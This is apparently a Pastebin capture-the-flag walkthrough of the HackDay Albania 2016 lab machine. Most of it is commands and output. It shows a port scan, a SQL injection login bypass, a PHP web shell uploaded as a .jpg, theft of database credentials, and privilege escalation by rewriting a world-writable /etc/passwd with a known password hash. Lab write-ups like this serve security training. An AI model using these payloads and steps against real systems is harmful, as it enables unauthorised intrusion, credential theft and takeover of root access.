Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Let's check our virtual machine IP:
- Currently scanning: 192.168.6.0/16 | Screen View: Unique Hosts
- 2 Captured ARP Req/Rep packets, from 2 hosts. Total size: 84
- _____________________________________________________________________________
- IP At MAC Address Count Len MAC Vendor / Hostname
- -----------------------------------------------------------------------------
- 192.168.1.84 08:00:27:98:0d:5f 1 42 CADMUS COMPUTER SYSTEMS
- (...)
- # With that IP, let's scan it to check what's going on:
- tlopes@blackbox:~$ nmap -p 1-65535 -v -A -T5 192.168.1.84
- Starting Nmap 7.01 ( https://nmap.org ) at 2016-11-28 00:02 WET
- NSE: Loaded 132 scripts for scanning.
- NSE: Script Pre-scanning.
- Initiating NSE at 00:02
- Completed NSE at 00:02, 0.00s elapsed
- Initiating NSE at 00:02
- Completed NSE at 00:02, 0.00s elapsed
- Initiating Ping Scan at 00:02
- Scanning 192.168.1.84 [2 ports]
- Completed Ping Scan at 00:02, 0.00s elapsed (1 total hosts)
- Initiating Parallel DNS resolution of 1 host. at 00:02
- Completed Parallel DNS resolution of 1 host. at 00:02, 0.03s elapsed
- Initiating Connect Scan at 00:02
- Scanning hackday.lan (192.168.1.84) [65535 ports]
- Discovered open port 22/tcp on 192.168.1.84
- Discovered open port 8008/tcp on 192.168.1.84
- Completed Connect Scan at 00:02, 1.44s elapsed (65535 total ports)
- Initiating Service scan at 00:02
- Scanning 2 services on hackday.lan (192.168.1.84)
- Completed Service scan at 00:02, 6.02s elapsed (2 services on 1 host)
- NSE: Script scanning 192.168.1.84.
- Initiating NSE at 00:02
- Completed NSE at 00:02, 0.51s elapsed
- Initiating NSE at 00:02
- Completed NSE at 00:02, 0.00s elapsed
- Nmap scan report for hackday.lan (192.168.1.84)
- Host is up (0.0060s latency).
- Not shown: 65533 closed ports
- PORT STATE SERVICE VERSION
- 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
- | ssh-hostkey:
- | 2048 39:76:a2:f0:82:5f:1f:75:0d:e4:c4:c5:a7:48:b1:58 (RSA)
- |_ 256 21:fe:63:45:2c:cb:a1:f1:b6:ba:36:dd:ed:d3:d9:48 (ECDSA)
- 8008/tcp open http Apache httpd 2.4.18 ((Ubuntu))
- | http-methods:
- |_ Supported Methods: GET HEAD POST OPTIONS
- | http-robots.txt: 26 disallowed entries (15 shown)
- | /rkfpuzrahngvat/ /slgqvasbiohwbu/ /tmhrwbtcjpixcv/
- | /vojtydvelrkzex/ /wpkuzewfmslafy/ /xqlvafxgntmbgz/ /yrmwbgyhouncha/
- | /zsnxchzipvodib/ /atoydiajqwpejc/ /bupzejbkrxqfkd/ /cvqafkclsyrgle/
- |_/unisxcudkqjydw/ /dwrbgldmtzshmf/ /exschmenuating/ /fytdinfovbujoh/
- |_http-server-header: Apache/2.4.18 (Ubuntu)
- |_http-title: HackDay Albania 2016
- Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
- NSE: Script Post-scanning.
- Initiating NSE at 00:02
- Completed NSE at 00:02, 0.00s elapsed
- Initiating NSE at 00:02
- Completed NSE at 00:02, 0.00s elapsed
- Read data files from: /usr/bin/../share/nmap
- Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 8.56 seconds
- tlopes@blackbox:~$
- -- we can see 2 different services running at ports 8008 (http) and 22 (ssh)
- # Robots.txt shows a lot of disallowed entries, let's check what's there:
- tlopes@blackbox:~$ for i in `curl 192.168.1.84:8008/robots.txt | cut -d: -f2`; do echo "======"; echo "Folder: $i"; curl "192.168.1.84:8008$i"; echo ""; done;
- % Total % Received % Xferd Average Speed Time Time Time Current
- Dload Upload Total Spent Left Speed
- 100 702 100 702 0 0 307k 0 --:--:-- --:--:-- --:--:-- 685k
- ======
- Folder: /rkfpuzrahngvat/
- <!DOCTYPE html>
- <html lang="en">
- <head>
- <meta charset="UTF-8">
- <title>Hmmmm????</title>
- </head>
- <body>
- <center><img src="background.jpg"></center>
- </body>
- </html>
- ======
- Folder: /slgqvasbiohwbu/
- <!DOCTYPE html>
- <html lang="en">
- <head>
- <meta charset="UTF-8">
- <title>Hmmmm????</title>
- </head>
- <body>
- <center><img src="background.jpg"></center>
- </body>
- </html>
- ======
- Folder: /tmhrwbtcjpixcv/
- (...)
- ======
- Folder: /unisxcudkqjydw/
- IS there any /vulnbank/ in there ???
- ======
- # Opening http://192.168.1.84:8008/unisxcudkqjydw/vulnbank/" and then going to "client/login.php"
- -- it was possible to see a login form
- # Submitting the form with variable names changed to Arrays username[] and password[] gave the following error:
- Notice: Array to string conversion in /var/www/html/unisxcudkqjydw/vulnbank/client/config.php on line 101
- Notice: Array to string conversion in /var/www/html/unisxcudkqjydw/vulnbank/client/config.php on line 101
- Invalid Credentials . . .
- -- I tried with some variants but nothing special happened
- # I've executed hydra to try some user/pass combinations but without luck
- hydra 192.168.122.95 -s 8008 http-post-form "/unisxcudkqjydw/vulnbank/client/login.php:username=^USER^&password=^PASS^:Invalid"
- # At the same time, I've executed sqlmap that found one blind injection ..
- -- haven't luck on putting sqlmap owning the database for me, so I did it for myself:
- .. after some tries.. I was able to bypass the form using the following combination:
- username: ' or 'a' = 'a' --
- password: #
- # On the new page there's a "Contact Support" form
- -- I tried to upload a .php file but it failed (only images allowed)
- -- so I renamed the file to .jpg and it worked!
- tlopes@blackbox:~$ cat shell.jpg
- <?php
- system($_GET['cmd']);
- # Testing the PHP:
- -- 192.168.1.84:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=id
- uid=33(www-data) gid=33(www-data) groups=33(www-data)
- # It worked! local access to the shell
- # Checking what's going on the current dir
- -- http://192.168.1.84:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=ls%20-al
- total 52
- drwxrwxr-x 4 taviso taviso 4096 Oct 20 12:28 .
- drwxrwxr-x 3 taviso taviso 4096 Oct 20 12:31 ..
- -rwxr-xr-x 1 taviso taviso 87 Oct 19 08:31 client.php
- -rwxr-xr-x 1 taviso taviso 4137 Oct 20 12:27 config.php
- drwxr-xr-x 2 taviso taviso 4096 Oct 19 08:15 images
- -rwxr-xr-x 1 taviso taviso 403 May 23 2016 index.php
- -rwxr-xr-x 1 taviso taviso 348 Oct 20 11:58 login.php
- -rwxr-xr-x 1 taviso taviso 81 May 22 2016 logout.php
- -rwxr-xr-x 1 taviso taviso 1198 Oct 20 12:28 ticket.php
- drwxrwxrwx 2 taviso taviso 4096 Nov 28 01:17 upload
- -rwxr-xr-x 1 taviso taviso 532 Oct 19 08:29 view_file.php
- -rwxr-xr-x 1 taviso taviso 1029 Oct 19 08:29 view_ticket.php
- # Checking the config.php
- -- 192.168.1.84:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=cat%20config.php
- (...)
- $db_host = "127.0.0.1";
- $db_name = "bank_database";
- $db_user = "root";
- $db_password = "NuCiGoGo321";
- (...)
- # Dumpping all databases:
- -- 192.168.1.84:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=mysqldump%20-uroot%20-pNuCiGoGo321%20--all-databases
- Nothing relevant on the dump
- # ps axu, init.d, cron.d and other relevant folders didn't returned anything valuable to attack
- # Tried to exploit mysqld with race conditions to escalate privileges, but it failed due permissions
- # After some time searching configurations I've found out that passwd was with write permissions:
- -- 192.168.1.84:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=ls%20-alhtr%20/etc%20|%20grep%20passwd
- -rw------- 1 root root 1.6K Oct 9 13:13 passwd-
- -rw-r--rw- 1 root root 1.6K Oct 22 17:21 passwd
- # Listing all users available:
- -- 192.168.1.84:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=cat%20/etc/passwd
- root:x:0:0:root:/root:/bin/bash
- daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
- bin:x:2:2:bin:/bin:/usr/sbin/nologin
- sys:x:3:3:sys:/dev:/usr/sbin/nologin
- sync:x:4:65534:sync:/bin:/bin/sync
- games:x:5:60:games:/usr/games:/usr/sbin/nologin
- man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
- lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
- mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
- news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
- uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
- proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
- www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
- backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
- list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
- irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
- gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
- nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
- systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
- systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
- systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
- systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
- syslog:x:104:108::/home/syslog:/bin/false
- _apt:x:105:65534::/nonexistent:/bin/false
- lxd:x:106:65534::/var/lib/lxd/:/bin/false
- mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
- messagebus:x:108:112::/var/run/dbus:/bin/false
- uuidd:x:109:113::/run/uuidd:/bin/false
- dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
- sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
- taviso:x:1000:1000:Taviso,,,:/home/taviso:/bin/bash
- # Let's try to change "taviso" account to a known password
- -- first simulating it in my own computer:
- tlopes@blackbox:~$ sudo adduser deleteme
- [sudo] password for tlopes:
- Adding user `deleteme' ...
- Adding new group `deleteme' (1001) ...
- Adding new user `deleteme' (1001) with group `deleteme' ...
- Creating home directory `/home/deleteme' ...
- Copying files from `/etc/skel' ...
- Enter new UNIX password:
- Retype new UNIX password:
- passwd: password updated successfully
- Changing the user information for deleteme
- Enter the new value, or press ENTER for the default
- Full Name []:
- Room Number []:
- Work Phone []:
- Home Phone []:
- Other []:
- Is the information correct? [Y/n]
- tlopes@blackbox:~$ sudo cat /etc/shadow | grep deleteme
- deleteme:$6$FlRgAWpu$XTECIpCMZIBy0nUexpRKQLXa70T9qx5td4eQbljc48.S/es3.TiI0DvPD3INXBIKn4k95ke/pRmjF.Aw5N3du/:17133:0:99999:7::
- # Let's use the previous hash as support to create the new "taviso" entry:
- taviso:$6$FlRgAWpu$XTECIpCMZIBy0nUexpRKQLXa70T9qx5td4eQbljc48.S/es3.TiI0DvPD3INXBIKn4k95ke/pRmjF.Aw5N3du/:1000:1000:Taviso,,,:/home/taviso:/bin/bash
- # Now, let's remove taviso from /etc/passwd
- 192.168.1.84:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=sed%20%27/taviso/d%27%20/etc/passwd%20>%20/tmp/passwd.bk
- 192.168.1.84:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=cp%20/tmp/passwd.bk%20/etc/passwd
- # And add our new "taviso" created in previous step:
- -- 192.168.1.84:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=echo%20%27taviso:$6$FlRgAWpu$XTECIpCMZIBy0nUexpRKQLXa70T9qx5td4eQbljc48.S/es3.TiI0DvPD3INXBIKn4k95ke/pRmjF.Aw5N3du/:1000:1000:Taviso,,,:/home/taviso:/bin/bash%27%20%3E%3E%20/etc/passwd
- # Confirming if everything went ok:
- -- 192.168.1.84:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=cat%20/etc/passwd%20|%20grep%20taviso
- Yup, the account it's there with our password "password"
- taviso:$6$FlRgAWpu$XTECIpCMZIBy0nUexpRKQLXa70T9qx5td4eQbljc48.S/es3.TiI0DvPD3INXBIKn4k95ke/pRmjF.Aw5N3du/:1000:1000:Taviso,,,:/home/taviso:/bin/bash
- # Now let's try to connect using SSH to this account:
- tlopes@blackbox:~$ ssh taviso@192.168.1.84
- The authenticity of host '192.168.1.84 (192.168.1.84)' can't be established.
- ECDSA key fingerprint is SHA256:IWIi1cnAziEW50tRA6HT1S4Zp/bo+pjpAvJ3FddNSOE.
- Are you sure you want to continue connecting (yes/no)? yes
- Warning: Permanently added '192.168.1.84' (ECDSA) to the list of known hosts.
- taviso@192.168.1.84's password:
- Welcome to Ubuntu 16.04.1 LTS (GNU/Linux 4.4.0-45-generic x86_64)
- * Documentation: https://help.ubuntu.com
- * Management: https://landscape.canonical.com
- * Support: https://ubuntu.com/advantage
- 36 packages can be updated.
- 2 updates are security updates.
- *** System restart required ***
- Last login: Sat Oct 29 23:07:00 2016
- -bash: warning: setlocale: LC_CTYPE: cannot change locale (pt_PT.UTF-8)
- taviso@hackday:~$
- -- BAM!
- # Let's see if taviso is on sudoers file :
- taviso@hackday:~$ sudo -i
- [sudo] password for taviso:
- -bash: warning: setlocale: LC_CTYPE: cannot change locale (pt_PT.UTF-8)
- root@hackday:~#
- -- BAM!
- # Let's see what root has on his home dir
- root@hackday:~#ls -al
- total 28
- drwx------ 3 root root 4096 Oct 22 17:21 .
- drwxr-xr-x 23 root root 4096 Nov 28 01:02 ..
- -rw------- 1 root root 58 Oct 22 17:21 .bash_history
- -rw-r--r-- 1 root root 3106 Oct 22 2015 .bashrc
- drwxr-xr-x 2 root root 4096 Oct 9 13:18 .nano
- -rw-r--r-- 1 root root 148 Aug 17 2015 .profile
- -rw-r--r-- 1 root root 61 Oct 9 13:36 flag.txt
- -- BAM! a flag :)
- root@hackday:~# cat flag.txt
- Urime,
- Tani nis raportin!
- d5ed38fdbf28bc4e58be142cf5a17cf5
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement